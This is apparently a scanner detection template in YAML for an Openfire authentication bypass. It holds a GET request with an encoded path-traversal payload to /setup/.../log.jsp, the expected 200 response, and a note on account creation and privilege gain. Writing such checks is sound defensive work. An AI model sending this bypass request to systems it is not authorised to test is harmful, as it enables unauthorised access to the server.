30 lines
763 B
YAML
keyword: openfire
name: Openfire authentication bypass
description: |
  The Openfire server has an authentication bypass vulnerability: by sending a specially crafted URL to the vulnerable server in a GET request, an attacker can create arbitrary accounts and then gain system privileges.
requests:
  path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
  method: GET
  headers:
    User-agent:
    Content-length:
    Accept:
    Content-type:
    Accept-Encoding:
    Cookie:
    Referer:
    X-Forwarded-For:
  body-raw: |-

response:
  status-code: 200
  body: "line"
  headers:
    Server:
    Content-type:
    Content-length:
    Date:
    Connection:
impact: |
  An attacker can exploit this vulnerability to create arbitrary accounts on the Openfire server and gain system privileges.